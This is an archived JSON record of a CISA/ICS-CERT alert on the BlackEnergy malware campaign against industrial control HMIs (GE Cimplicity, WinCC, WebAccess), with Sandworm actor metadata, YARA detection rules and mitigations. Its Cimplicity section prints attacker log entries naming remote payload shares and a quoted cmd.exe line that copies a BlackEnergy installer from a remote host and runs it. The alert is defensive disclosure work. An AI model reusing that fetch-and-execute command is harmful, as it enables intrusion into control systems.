{
	"id": "8f3ee82b-a0ee-4344-b215-d14a58f3e8ea",
	"created_at": "2026-04-06T00:21:15.482422Z",
	"updated_at": "2026-04-10T13:12:57.205008Z",
	"deleted_at": null,
	"sha1_hash": "add962e0d20dcb97657f52750d13c42dbd884fb4",
	"title": "Ongoing Sophisticated Malware Campaign Compromising ICS (Update E) | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 88164,
	"plain_text": "Ongoing Sophisticated Malware Campaign Compromising ICS\r\n(Update E) | CISA\r\nPublished: 2021-07-22 · Archived: 2026-04-05 17:20:29 UTC\r\nDescription\r\nThis alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01D Ongoing\r\nSophisticated Malware Campaign Compromising ICS that was published February 2, 2016, on the ICS-CERT web\r\nsite.\r\nUpdated July 20, 2021: The U.S. Government attributes this activity to Russian nation-state cyber actors. Analysis\r\nindicates that this campaign has been ongoing since at least 2011 and was conducted by Russian nation-state\r\ncyber actors. For more information on Russian malicious cyber activity, refer to us-cert.cisa.gov/Russia.\r\nSUMMARY\r\nThis alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-281-01D Ongoing\r\nSophisticated Malware Campaign Compromising ICS that was published February 2, 2016, on the ICS-CERT web\r\nsite.\r\nICS-CERT has identified a sophisticated malware campaign that has compromised numerous industrial control\r\nsystems (ICSs) environments using a variant of the BlackEnergy malware. Analysis indicates that this campaign\r\nhas been ongoing since at least 2011. Multiple companies working with ICS-CERT have identified the malware on\r\nInternet-connected human-machine interfaces (HMIs).\r\nRecent open-source reports have circulated alleging that a December 23, 2015, power outage in Ukraine was\r\ncaused by BlackEnergy Malware. ICS-CERT and US-CERT are working with the Ukrainian CERT and our\r\ninternational partners to analyze the malware and can confirm that a BlackEnergy 3 variant was present in the\r\nsystem. Based on the technical artifacts ICS-CERT and US-CERT have been provided, we cannot confirm a\r\ncausal link between the power outage and the presence of the malware. However, we continue to support CERT-UA on this issue. 
The YARA signature included with the original posting of this alert has been shown to identify a\r\nmajority of the samples seen as of this update and continues to be the best method for detecting BlackEnergy\r\ninfections.\r\nWhile there are many open source reports of BE3, this is the first opportunity ICS-CERT has been able to provide\r\nresults of malware analysis. In a departure from the ICS product vulnerabilities used to deliver the BE2 malware,\r\nin this case the infection vector appears to have been spear phishing via a malicious Microsoft Office (MS Word)\r\nattachment. ICS-CERT and US-CERT analysis and support are ongoing, and additional technical analysis will be\r\nmade available on the US-CERT Secure Portal.\r\nICS-CERT originally published information and technical indicators about this campaign in a TLP Amber alert\r\n(ICS-ALERT-14-281-01P) that was released to the US-CERT secure portal on October 8, 2014, and updated on\r\nDecember 10, 2014. (Footnote: ICS-CERT encourages US asset owners and operators to join the control systems\r\ncompartment of the US-CERT secure portal. To request access to the secure portal send your name, email address,\r\nand company affiliation to ics-cert@hq.dhs.gov.) US critical infrastructure asset owners and operators can request\r\naccess to this information by emailing ics-cert@hq.dhs.gov.\r\nhttps://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B\r\nPage 1 of 9\n\nDETAILS\r\nICS-CERT has determined that users of HMI products from various vendors have been targeted in this campaign,\r\nincluding GE Cimplicity, Advantech/Broadwin WebAccess, and Siemens WinCC. It is currently unknown whether\r\nother vendors’ products have also been targeted. ICS‑CERT is working with the involved vendors to evaluate this\r\nactivity and also notify their users of the linkages to this campaign.\r\nAt this time, ICS-CERT has not identified any attempts to damage, modify, or otherwise disrupt the victim\r\nsystems’ control processes. 
ICS-CERT has not been able to verify if the intruders expanded access beyond the\r\ncompromised HMI into the remainder of the underlying control system. However, typical malware deployments\r\nhave included modules that search out any network-connected file shares and removable media for additional\r\nlateral movement within the affected environment. The malware is highly modular and not all functionality is\r\ndeployed to all victims.\r\nIn addition, public reports (Sandworm to Blacken: The SCADA Connection, http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/, web site last accessed October 28, 2014;\r\nSandworm Team – Targeting SCADA Systems, http://www.isightpartners.com/tag/sandworm-team/, web site last\r\naccessed October 28, 2014) reference a BlackEnergy-based campaign against a variety of overseas targets\r\nleveraging vulnerability CVE-2014-4114 (NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4114,\r\nweb site last accessed October 28, 2014), affecting Microsoft Windows and Windows Server 2008 and 2012.\r\nICS-CERT has not observed the use of this vulnerability to target control system environments. However, analysis\r\nof the technical findings in the two reports shows linkages in the shared command and control infrastructure\r\nbetween the campaigns, suggesting both are part of a broader campaign by the same threat actor.\r\nICS-CERT strongly encourages asset owners and operators to look for signs of compromise within their control\r\nsystems environments. Any positive or suspected findings should be immediately reported to ICS-CERT for\r\nfurther analysis and correlation.\r\nCIMPLICITY\r\nICS-CERT analysis has identified the probable initial infection vector for systems running GE’s Cimplicity HMI\r\nwith a direct connection to the Internet. 
Analysis of victim system artifacts has determined that the actors have\r\nbeen exploiting a vulnerability in GE’s Cimplicity HMI product since at least January 2012. The vulnerability,\r\nCVE-2014-0751, was published in ICS‑CERT advisory ICSA-14-023-01 on January 23, 2014. Guidance for\r\nremediation was published to the GE IP portal in December 2013 (GE Intelligent Platforms, http://support.ge-ip.com/support/index?page=kbchannel, web site last accessed October 28, 2014). GE has also released a statement\r\nabout this campaign on the GE security web site (GE, http://www.ge.com/security, web site last accessed October\r\n28, 2014).\r\nUsing this vulnerability, attackers were able to have the HMI server execute a malicious .cim file [Cimplicity\r\nscreen file] hosted on an attacker-controlled server.\r\nDate              Request Type    Requestor IP      Screen Served\r\n1/17/2012 7:16    Start           \u003cattackerIP\u003e      //212.124.110.146/testshare/payload.cim\r\n9/9/2013 1:49     Start           \u003cattackerIP\u003e      //46.165.250.32/incoming/devlist.cim\r\n9/10/2014 3:59    Start           \u003cattackerIP\u003e      \\\\94.185.85.122\\public\\config.bak\r\nFigure 1. Log entries showing execution of remote .cim file.\r\nICS-CERT has analyzed two different .cim files used in this campaign: devlist.cim and config.bak. Both files use\r\nscripts to ultimately install the BlackEnergy malware.\r\ndevlist.cim: This file uses an embedded script that is executed as soon as the file is opened using the Screen\r\nOpen event. The obfuscated script downloads the file “newsfeed.xml” from the same remote server, which\r\nit saves in the Cimplicity directory using the name \u003c41 character string\u003e.wsf. The name is randomly\r\ngenerated using upper and lower case letters, numbers, and hyphens. 
The .wsf script is then executed using\r\nthe Windows command-based script host (cscript.exe). The new script downloads the file “category.xml,”\r\nwhich it saves in the Cimplicity directory using the name “CimWrapPNPS.exe.” CimWrapPNPS.exe is a\r\nBlackEnergy installer that deletes itself once the malware is installed.\r\nconfig.bak: This file uses a script that is executed when the file is opened using the OnOpenExecCommand\r\nevent. The script downloads a BlackEnergy installer from a remote server, names it “CimCMSafegs.exe,”\r\ncopies it into the Cimplicity directory, and then executes it. The CimCMSafegs.exe file is a BlackEnergy\r\ninstaller that deletes itself after the malware is installed.\r\ncmd.exe /c \"copy \\\\94[dot]185[dot]85[dot]122\\public\\default.txt \"%CIMPATH%\\CimCMSafegs.exe\" \u0026\u0026\r\nstart \"WOW64\" \"%CIMPATH%\\CimCMSafegs.exe\"\r\nFigure 2. Script executed by malicious config.bak file.\r\nAnalysis suggests that the actors likely used automated tools to discover and compromise vulnerable systems.\r\nICS-CERT is concerned that any companies that have been running Cimplicity since 2012 with their HMI directly\r\nconnected to the Internet could be infected with BlackEnergy malware. ICS-CERT strongly recommends that\r\ncompanies use the indicators and YARA signature in this alert to check their systems. 
In addition, we recommend\r\nthat all Cimplicity users review ICS-CERT advisory ICSA-14-023-01 and apply the recommended mitigations.\r\nWINCC\r\nWhile ICS-CERT lacks definitive information on how WinCC systems are being compromised by BlackEnergy,\r\nthere are indications that one of the vulnerabilities fixed with the latest update for SIMATIC WinCC may have\r\nbeen exploited by the BlackEnergy malware (see “Nov 21, 2014 (second publication) Siemens Industrial Security\r\nWebsite: Update on ICS-CERT Alert on malware targeting SIMATIC WinCC,”\r\nhttp://www.industry.siemens.com/topics/global/en/industrial-security/news-alerts/Pages/alerts.aspx). ICS-CERT\r\nstrongly encourages users of WinCC, TIA Portal, and PCS7 to update their software to the most recent version as\r\nsoon as possible. Please see Siemens Security Advisory SSA-134508 and ICS‑CERT advisory ICSA-14-329-02D\r\nfor additional details.\r\nADVANTECH/BROADWIN WEBACCESS\r\nA number of the victims associated with this campaign were running the Advantech/BroadWin WebAccess\r\nsoftware with a direct Internet connection. We have not yet identified the initial infection vector for victims\r\nrunning this platform but believe it is being targeted.\r\nDETECTION\r\nYARA SIGNATURE\r\nICS-CERT has published instructions for how to use the YARA signature for typical information technology\r\nenvironments. ICS-CERT recommends a phased approach to utilize this YARA signature in an industrial control\r\nsystems (ICSs) environment. Test the use of the signature in the test/quality assurance/development ICS\r\nenvironment if one exists. 
If not, deploy the signature against backup or alternate systems in the top end of the\r\nICS environment; this signature will not be usable on the majority of field devices.\r\n--------- Begin Update E Part 1 of 1 --------\r\nICS-CERT has produced a YARA signature to aid in identifying if the malware files are present on a given system.\r\nThis signature is provided “as is” and has not been fully tested for all variations or environments. Any positive or\r\nsuspected findings should be immediately reported to ICS‑CERT for further analysis and correlation. The YARA\r\nsignature is available at:\r\nhttps://us-cert.gov/sites/default/files/file_attach/ICS-ALERT-14-281-01E.yara\r\nYARA is a pattern-matching tool used by computer security researchers and companies to help identify\r\nmalware. You can find usage help and download links on the main YARA page at http://plusvic.github.io/yara/.\r\nFor use on a Windows machine, you can download the precompiled binaries at:\r\nhttps://github.com/plusvic/yara/releases\r\nLook for “Windows binaries can be found here.” For security purposes, please validate the downloaded YARA\r\nbinaries by comparing the hash of your downloaded binary with the hashes below:\r\nYARA version 3.4.0 32-bit\r\nyara32.exe:\r\nMD5 - 569ba3971c5f2d5d4a25f2528ee3afb6\r\nSHA256 - e9bfb0389c9c1638dfe683acb5a2fe6c407cb650b48efdc9c17f5deaffe5b360\r\nyarac32.exe:\r\nMD5 - 0d9287bd49a1e1887dcfe26330663c25\r\nSHA256 - 9f107dda72f95ad721cf12ab9c5621d8e57160cce7baf3f42cb751f98dfaf3ce\r\nYARA version 3.4.0 64-bit\r\nyara64.exe:\r\nMD5 - 5a10f9e4f959d4dc47c96548804ff3c4\r\nSHA256 - 427b46907aba3f1ce7dd8529605c1f94a65c8b90020f5cd1d76a5fbc7fc39993\r\nyarac64.exe:\r\nMD5 - 1f248ec809cc9ed89646e89a7b97a806\r\nSHA256 - 92d04ea1b02320737bd9e2f40ab6cbf0f9646bf8ed63a5262ed989cd43a852fb\r\nOnce downloaded, extract the zip archive to the computer where you need to run the signatures and copy the 
ICS-CERT YARA rule into the same folder. For a comprehensive search (which will take a number of hours,\r\ndepending on the system), use the following command:\r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C: \u003e\u003e yara_results.txt\r\nFor a quicker search, use the following:\r\n(for Windows Vista and later)\r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C:\\Windows \u003e\u003e yara_results.txt\r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C:\\Users \u003e\u003e yara_results.txt\r\n(for Windows XP or earlier)\r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara C:\\Windows \u003e\u003e yara_results.txt\r\nyara32.exe -r -s ICS-ALERT-14-281-01E.yara \"C:\\Documents and Settings\" \u003e\u003e yara_results.txt\r\nThese commands will create a text file named “yara_results.txt” in the same folder as the rule and YARA\r\nexecutable. If the search returns hits, you can send this file to ICS-CERT, and ICS‑CERT will verify if your\r\nsystem is compromised by BlackEnergy.\r\nThis updated YARA signature reflects ICS-CERT’s current analysis of the new BlackEnergy malware. Please use\r\ncaution before implementing this signature in sensitive network environments. The signature may not detect all\r\nversions of BlackEnergy found in the “wild”. If there are any questions or concerns, please contact ICS-CERT for\r\nassistance.\r\n// detect common properties of the BE2 and BE3 loader\r\nrule BlackEnergy\r\n{\r\n    strings:\r\n        $hc1 = {68 97 04 81 1D 6A 01}\r\n        $hc2 = {68 A8 06 B0 3B 6A 02}\r\n        $hc3 = {68 14 06 F5 33 6A 01}\r\n        $hc4 = {68 AF 02 91 AB 6A 01}\r\n        $hc5 = {68 8A 86 39 56 6A 02}\r\n        $hc6 = {68 19 2B 90 95 6A 01}\r\n        $hc7 = {(68 | B?) 11 05 90 23}\r\n        $hc8 = {(68 | B?) EB 05 4A 2F}\r\n        $hc9 = {(68 | B?) B7 05 57 2A}\r\n    condition:\r\n        2 of ($hc*)\r\n}\r\n// detect BE3 variants that are not caught by the general BlackEnergy rule\r\nrule BlackEnergy3\r\n{\r\n    strings:\r\n        $a1 = \"MCSF_Config\" ascii\r\n        $a2 = \"NTUSER.LOG\" ascii\r\n        $a3 = \"ldplg\" ascii\r\n        $a4 = \"unlplg\" ascii\r\n        $a5 = \"getp\" ascii\r\n        $a6 = \"getpd\" ascii\r\n        $a7 = \"CSTR\" ascii\r\n        $a8 = \"FONTCACHE.DAT\" ascii\r\n    condition:\r\n        4 of them\r\n}\r\n// detect both packed and unpacked variants of the BE2 driver\r\nrule BlackEnergy2_Driver\r\n{\r\n    strings:\r\n        $a1 = {7E 4B 54 1A}\r\n        $a2 = {E0 3C 96 A2}\r\n        $a3 = \"IofCompleteRequest\" ascii\r\n        $b1 = {31 A1 44 BC}\r\n        $b2 = \"IoAttachDeviceToDeviceStack\" ascii\r\n        $b3 = \"KeInsertQueueDpc\" ascii\r\n        $c1 = {A3 41 FD 66}\r\n        $c2 = {61 1E 4E F8}\r\n        $c3 = \"PsCreateSystemThread\" ascii\r\n    condition:\r\n        all of ($a*) and 3 of ($b*, $c*)\r\n}\r\n// detect BE2 variants, typically plugins or loaders containing plugins\r\nrule BlackEnergy2\r\n{\r\n    strings:\r\n        $ex1 = \"DispatchCommand\" ascii\r\n        $ex2 = \"DispatchEvent\" ascii\r\n        $a1 = {68 A1 B0 5C 72}\r\n        $a2 = {68 6B 43 59 4E}\r\n        $a3 = {68 E6 4B 59 4E}\r\n    condition:\r\n        all of ($ex*) and 3 of ($a*)\r\n}\r\n--------- End Update E Part 1 of 1 --------\r\nMITIGATIONS\r\nICS-CERT has published a TLP Amber version of this alert containing additional information about the malware,\r\nplug-ins, and indicators to the secure portal. ICS-CERT strongly encourages asset owners and operators to use\r\nthese indicators to look for signs of compromise within their control systems environments. 
Asset owners and\r\noperators can request access to this information by emailing ics-cert@hq.dhs.gov.\r\nAny positive or suspected findings should be immediately reported to ICS-CERT for further analysis and\r\ncorrelation.\r\nICS-CERT strongly encourages taking immediate defensive action to secure ICS systems using defense-in-depth\r\nprinciples (CSSP Recommended Practices, https://ics-cert.us-cert.gov/Recommended-Practices, web site last\r\naccessed October 28, 2014). Asset owners should not assume that their control systems are deployed securely or\r\nthat they are not operating with an Internet accessible configuration. Instead, asset owners should thoroughly audit\r\ntheir networks for Internet facing devices, weak authentication methods, and component vulnerabilities. Control\r\nsystems often have Internet accessible devices installed without the owner’s knowledge, putting those systems at\r\nincreased risk of attack.\r\nICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these\r\nvulnerabilities and of unsecure device configurations. Specifically, users should:\r\nMinimize network exposure for all control system devices. 
Control system devices should not directly face\r\nthe Internet.\r\nLocate control system networks and devices behind firewalls, and isolate them from the business network.\r\nIf remote access is required, employ secure methods, such as Virtual Private Networks (VPNs),\r\nrecognizing that VPN is only as secure as the connected devices.\r\nRemove, disable, or rename any default system accounts wherever possible.\r\nApply patches in the ICS environment, when possible, to mitigate known vulnerabilities.\r\nImplement policies requiring the use of strong passwords.\r\nMonitor the creation of administrator level accounts by third-party vendors.\r\nICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to taking defensive\r\nmeasures.\r\nICS-CERT also provides a recommended practices section for control systems on the ICS-CERT web site\r\n(http://ics-cert.us-cert.gov). Several recommended practices are available for reading or download, including\r\nImproving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\r\nOrganizations that observe any suspected malicious activity should follow their established internal procedures\r\nand report their findings to ICS-CERT for tracking and correlation against other incidents.\r\nSource: https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B"
	],
	"report_names": [
		"ICS-ALERT-14-281-01B"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434875,
	"ts_updated_at": 1775826777,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/add962e0d20dcb97657f52750d13c42dbd884fb4.pdf",
		"text": "https://archive.orkl.eu/add962e0d20dcb97657f52750d13c42dbd884fb4.txt",
		"img": "https://archive.orkl.eu/add962e0d20dcb97657f52750d13c42dbd884fb4.jpg"
	}
}